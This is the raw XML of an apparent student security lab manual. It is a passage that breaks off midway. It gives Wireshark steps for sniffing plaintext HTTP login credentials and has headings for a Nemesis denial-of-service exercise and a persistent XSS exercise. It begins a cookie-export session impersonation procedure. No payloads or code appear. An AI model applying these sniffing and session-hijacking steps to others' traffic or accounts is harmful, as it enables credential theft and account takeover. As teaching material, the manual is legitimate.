            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="425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1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00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 2: Go to Capture tab and select Interface option.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514104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152288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5881647" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="427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1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647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  <w:spacing w:before="8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type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1240" w:left="12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390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00296621">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 3: In Capture interface, Select Local Area Connection and click on start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141145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5936728" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="429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1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728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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="190"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141248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163844</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917066" cy="3186112"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="431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1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66" cy="3186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 w:rsidP="00E54A23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="124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D03C4" w:rsidP="00E54A23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141350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577796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="433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1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6621" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:tab/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  <w:spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 5: Open a website in a new window and enter the user id and password. Register if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141452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162548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5928851" cy="3829050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="435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1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851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  <w:spacing w:before="10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80" w:right="1040" w:bottom="132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spacing w:before="3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 6: Enter the credentials and then sign in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141555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231986</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5947180" cy="3845052"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="437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1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180" cy="3845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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="226"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step 7: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> tool will keep recording the packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141657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161876</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5881647" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="439" name="image2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2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647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  <w:spacing w:before="2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80" w:right="1040" w:bottom="132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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>Step 8: Select filter as http to make the search easier and click on apply.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141760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5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="441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2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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="166"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 9: Now stop the tool to stop recording.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141862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153176</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="443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2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  <w:spacing w:before="8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footerReference w:type="default" r:id="rId60"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="620" w:right="1040" w:bottom="920" w:left="1220" w:header="0" w:footer="73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296621" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8316"/>
        </w:tabs>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 10: Find the post methods for username and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25141964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5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="445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22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D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="166"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 11: U will see the email- id and password that you used to log in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25142067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153176</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5975000" cy="994410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="447" name="image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223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0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D569E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D569E9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D569E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D569E9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:pict>
          <v:line id=" 95" o:spid="_x0000_s1084" style="position:absolute;left:0;text-align:left;z-index:252043264;visibility:visible;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" from="70.6pt,718.2pt" to="541.55pt,718.2pt" o:gfxdata="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&#10;BQYAAAAABAAEAPMAAACABQAAAAA=&#10;" strokecolor="#a3a3a3">
            <o:lock v:ext="edit" shapetype="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Using NEMESIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6337300" cy="2710815"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="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9E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D569E9" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1040" w:left="1220" w:header="0" w:footer="73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8577E0" w:rsidRPr="00D4195F" w:rsidRDefault="008577E0" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="4258" w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="008577E0" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:right="4258"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">AIM: Simulate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>persistant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED1477" w:rsidRPr="00D4195F">
        <w:t>Cross Site Scripting</w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED1477" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5876925" cy="38957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477" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5876925" cy="36766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477" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477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E141B2" w:rsidRPr="00D4195F" w:rsidRDefault="00E141B2" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PRACTICAL NO.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00E141B2" w:rsidP="00E141B2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: </w:t>
      </w:r>
      <w:r w:rsidR="00401CBD" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Session impersonation using Firefox and Tamper Data add-on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>A] Session Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>STEPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Go to Tools &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Addons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &gt; Extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Search and install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>EditThisCookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> or Cookie Import/Export or any other Cookie tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click on Cookie extension to get cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Open a Website and Login and then click on export cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2238375" cy="5429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9A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2581275" cy="29718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9A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Logout from the webpage once the cookie got exported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459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A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
